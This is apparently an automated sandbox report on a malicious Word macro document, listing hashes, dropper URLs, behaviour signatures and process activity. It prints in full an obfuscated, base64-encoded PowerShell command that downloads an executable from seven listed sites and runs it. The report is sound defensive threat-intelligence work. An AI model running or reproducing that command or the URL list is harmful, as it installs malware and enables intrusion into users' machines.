Analysis

  • max time kernel
    137s
  • max time network
    125s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-05-2024 02:21

General

  • Target

    27d3cc774970625c5e64dfe2e0b76f04_JaffaCakes118.doc

  • Size

    190KB

  • MD5

    27d3cc774970625c5e64dfe2e0b76f04

  • SHA1

    ff436c6b434f5219c8f467cf43206fbc0f304d51

  • SHA256

    35e34300ab10fbfe1170498fd9dfd74c724196f3a6c7e0c94b6c24246b6857d5

  • SHA512

    3052495cf40bdeebf5712983712b10bbd7778362b595b853981371e48d5380ea7bce6f37505589d21c2405d55686bc7fc8557ff8e3d5252cdfd0e706c4d43baf

  • SSDEEP

    3072:i9ufstRUUKSns8T00JSHUgteMJ8qMD7gj20zKNf9cfmfE7qdmVJKk/Juvc5a8a8R:i9ufsfgIf0pLxKb2

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://reklamdasiniz.com/wp-admin/W/

exe.dropper

http://www.paramedicaleducationguidelines.com/wp-admin/7S/

exe.dropper

http://bimasoftcbt.maannajahjakarta.com/wp-admin/i3K/

exe.dropper

http://casualhome.com/wp-admin/Y/

exe.dropper

https://aemine.vn/wp-admin/KMq/

exe.dropper

http://aahnaturals.net/wp-includes/A3/

exe.dropper

https://sbsec.org/bsadmin-portal/1nf/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\27d3cc774970625c5e64dfe2e0b76f04_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1392
  • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
    POwersheLL -ENCOD JABWAHQAbQBmADQAegB5AD0AKAAoACcATABsACcAKwAnADcAJwApACsAKAAnAGwAJwArACcAMQBpACcAKQArACcAeQAnACkAOwAmACgAJwBuAGUAdwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABlAE4AVgA6AHUAcwBFAHIAUABSAE8ARgBpAEwARQBcAEsAdgBvADkAOQAwAFcAXAB5AGgAVwAwAFMAOABlAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQBSAGUAYwB0AG8AcgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwB1AGAAUgBJAGAAVAB5AFAAYABSAG8AVABvAGAAYwBvAEwAIgAgAD0AIAAoACcAdABsACcAKwAoACcAcwAxACcAKwAnADIALAAgACcAKQArACcAdAAnACsAKAAnAGwAcwAxACcAKwAnADEALAAnACsAJwAgAHQAbABzACcAKQApADsAJABBADAAOABwAHMAcABfACAAPQAgACgAKAAnAE4AJwArACcANABrACcAKQArACgAJwBxACcAKwAnAHUAcAAnACkAKQA7ACQAVwB3AGUAcwBnAHUAcwA9ACgAJwBEACcAKwAoACcANgByACcAKwAnAHYAJwApACsAKAAnADAAJwArACcAYwA1ACcAKQApADsAJABWAGgAYwBxAG8AZwBxAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAE8AJwArACgAJwBxAEkAJwArACcASwB2AG8AOQAnACkAKwAoACcAOQAwAHcATwBxAEkAJwArACcAWQBoACcAKQArACcAdwAnACsAJwAwACcAKwAnAHMAJwArACgAJwA4ACcAKwAnAGUATwBxAEkAJwApACkAIAAgAC0AUgBlAFAAbABhAEMARQAoACcATwAnACsAJwBxAEkAJwApACwAWwBDAEgAQQByAF0AOQAyACkAKwAkAEEAMAA4AHAAcwBwAF8AKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAFMAOAA1AHMAeABkAGsAPQAoACcAUwAnACsAKAAnAHUAdAAnACsAJwBwAHoAeAB6ACcAKQApADsAJABKAGgANQBnAG4ANwBmAD0AJgAoACcAbgAnACsAJwBlAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABuAEUAdAAuAHcARQBiAGMAbABpAEUAbgBUADsAJABUADgAeQA4AGsAeAB5AD0AKAAoACcAaAB0AHQAJwArACcAcAA6AC8AJwArACcALwByAGUAawAnACsAJwBsAGEAbQAnACsAJwBkACcAKQArACgAJwBhAHMAJwArACcAaQBuAGkAegAnACsAJwAuAGMAbwBtAC8AJwApACsAKAAnAHcAcAAnACsAJwAtACcAKQArACcAYQAnACsAJwBkAG0AJwArACgAJwBpACcAKwAnAG4ALwBXAC8AKgAnACkAKwAoACcAaAB0AHQAJwArACcAcAAnACkAKwAoACcAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwB3AC4AcAAnACsAJwBhACcAKQArACgAJwByAGEAbQBlAGQAJwArACcAaQBjAGEAbAAnACkAKwAnAGUAJwArACgAJwBkAHUAYwAnACsAJwBhACcAKQArACgAJwB0ACcAKwAnAGkAbwBuAGcAdQAnACsAJwBpAGQAZQBsAGkAbgAnACkAKwAoACcAZQAnACsAJwBzAC4AJwApACsAKAAnAGMAbwBtAC8AdwBwACcAKwAnAC0AYQBkACcAKwAnAG0AJwApACsAKAAnAGkAbgAnACsAJwAvADcAUwAvACoAJwArACcAaAAnACkAKwAoACcAdAB0AHAAJwArACcAOgAvAC8AJwArACcAYgBpAG0AYQAnACsAJwBzACcAKQArACcAbwAnACsAKAAnAGYAdABjAGIAJwArACcAdAAuAG0AYQAnACsAJwBhAG4AJwApACsAKAAnAG4AJwArACcAYQBqACcAKQArACgAJwBhACcAKwAnAGgAagBhACcAKwAnAGsAYQAnACkAKwAnAHIAdAAnACsAJwBhACcAKwAnAC4AJwArACgAJwBjAG8AbQAvACcAKwAnAHcAcAAnACkAKwAoACcALQAnACsAJwBhAGQAbQBpACcAKwAnAG4AJwApACsAKAAnAC8AaQAnACsAJwAzAEsALwAqACcAKwAnAGgAdAB0AHAAJwArACcAOgAvAC8AJwApACsAKAAnAGMAYQBzAHUAYQBsACcAKwAnAGgAbwBtAGUALgBjACcAKwAnAG8AJwApACsAKAAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQAnACkAKwAoACcAaQAnACsAJwBuAC8AWQAvACcAKwAnACoAaAB0ACcAKwAnAHQAcABzADoALwAvAGEAJwArACcAZQBtACcAKQArACgAJwBpACcAKwAnAG4AZQAnACkAKwAoACcALgB2ACcAKwAnAG4AJwApACsAJwAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAJwBhACcAKwAoACcAZAAnACsAJwBtAGkAJwApACsAJwBuACcAKwAnAC8AJwArACgAJwBLAE0AcQAvACcAKwAnACoAJwArACcAaAB0AHQAcAA6ACcAKQArACgAJwAvAC8AYQBhACcAKwAnAGgAJwApACsAKAAnAG4AYQAnACsAJwB0ACcAKQArACgAJwB1ACcAKwAnAHIAJwArACcAYQBsACcAKwAnAHMALgBuAGUAdAAvAHcAcAAnACkAKwAnAC0AaQAnACsAKAAnAG4AYwBsAHUAZAAnACsAJwBlACcAKwAnAHMALwBBADMALwAqAGgAdAB0AHAAJwArACcAcwAnACkAKwAoACcAOgAvAC8AcwAnACsAJwBiACcAKQArACcAcwAnACsAJwBlAGMAJwArACgAJwAuACcAKwAnAG8AcgAnACkAKwAoACcAZwAnACsAJwAvAGIAJwApACsAKAAnAHMAJwArACcAYQBkAG0AaQAnACkAKwAoACcAbgAtACcAKwAnAHAAJwApACsAKAAnAG8AJwArACcAcgB0ACcAKQArACgAJwBhAGwAJwArACcALwAxACcAKQArACgAJwBuACcAKwAnAGYALwAnACkAKQAuACIAUwBgAFAATABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABLAGcAcQB1AHoAZwBzAD0AKAAoACcAWQBwADMAJwArACcAcgBpACcAKQArACcAeQAnACsAJwB6ACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAE0AcwByAHkAYQAwAG4AIABpAG4AIAAkAFQAOAB5ADgAawB4AHkAKQB7AHQAcgB5AHsAJABKAGgANQBnAG4ANwBmAC4AIgBkAGAAbwBXAE4AbABPAGAAQQBEAGYAYABJAGwAZQAiACgAJABNAHMAcgB5AGEAMABuACwAIAAkAFYAaABjAHEAbwBnAHEAKQA7ACQAUwAwAHYAdAAyADkAMgA9ACgAJwBJADYAJwArACgAJwA0AHgAJwArACcAYQAnACkAKwAnAGMAZwAnACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQAVgBoAGMAcQBvAGcAcQApAC4AIgBsAEUATgBgAGcAYABUAGgAIgAgAC0AZwBlACAAMgA5ADgANAAyACkAIAB7AC4AKAAnAEkAbgB2ACcAKwAnAG8AawBlAC0AJwArACcASQB0AGUAbQAnACkAKAAkAFYAaABjAHEAbwBnAHEAKQA7ACQAUABmADQAeABrAGcAdAA9ACgAJwBVACcAKwAnAHUAJwArACgAJwBoAG0ANAAnACsAJwBhAGIAJwApACkAOwBiAHIAZQBhAGsAOwAkAE4AMQAyAGMAZgBmAHMAPQAoACgAJwBRAGkAJwArACcANQBuADcAJwApACsAJwBhACcAKwAnADcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABHAGwAdwBzADcAbgBwAD0AKAAoACcAQQBlACcAKwAnADkAJwApACsAKAAnAG4AdQByACcAKwAnAHQAJwApACkA
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3128

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCD7773.tmp\sist02.xsl

    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fnwufsmq.mwy.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\Kvo990W\yhW0S8e\N4kqup.exe

    Filesize

    120KB

    MD5

    593cf4854d95daeee0c8b187f381389d

    SHA1

    4bf69b4abcff4ed7282f8754d2cf2bdf083c21ef

    SHA256

    784779659165e7df53322c39843ac9e6e9b632923c456160634a0b95d1db9e37

    SHA512

    33febee6abc70648d704e243650fa06224cbd1b8613035493724b2119fdfa40bd99923799fedcda24c506b53deaf8ddbc0678598b921fec6211b9e4bbc6eae4d

  • memory/1392-22-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-9-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-36-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-4-0x00007FFD597F0000-0x00007FFD59800000-memory.dmp

    Filesize

    64KB

  • memory/1392-7-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-8-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-10-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-24-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-13-0x00007FFD57560000-0x00007FFD57570000-memory.dmp

    Filesize

    64KB

  • memory/1392-12-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-11-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-14-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-23-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-17-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-18-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-19-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-21-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-20-0x00007FFD57560000-0x00007FFD57570000-memory.dmp

    Filesize

    64KB

  • memory/1392-16-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-0-0x00007FFD597F0000-0x00007FFD59800000-memory.dmp

    Filesize

    64KB

  • memory/1392-15-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-6-0x00007FFD597F0000-0x00007FFD59800000-memory.dmp

    Filesize

    64KB

  • memory/1392-5-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-40-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-611-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-2-0x00007FFD597F0000-0x00007FFD59800000-memory.dmp

    Filesize

    64KB

  • memory/1392-607-0x00007FFD597F0000-0x00007FFD59800000-memory.dmp

    Filesize

    64KB

  • memory/1392-3-0x00007FFD597F0000-0x00007FFD59800000-memory.dmp

    Filesize

    64KB

  • memory/1392-608-0x00007FFD597F0000-0x00007FFD59800000-memory.dmp

    Filesize

    64KB

  • memory/1392-103-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-105-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-104-0x00007FFD9980D000-0x00007FFD9980E000-memory.dmp

    Filesize

    4KB

  • memory/1392-1-0x00007FFD9980D000-0x00007FFD9980E000-memory.dmp

    Filesize

    4KB

  • memory/1392-584-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-583-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-585-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-586-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/1392-609-0x00007FFD597F0000-0x00007FFD59800000-memory.dmp

    Filesize

    64KB

  • memory/1392-610-0x00007FFD597F0000-0x00007FFD59800000-memory.dmp

    Filesize

    64KB

  • memory/3128-97-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB

  • memory/3128-79-0x000001E326B00000-0x000001E326B22000-memory.dmp

    Filesize

    136KB

  • memory/3128-73-0x00007FFD99770000-0x00007FFD99965000-memory.dmp

    Filesize

    2.0MB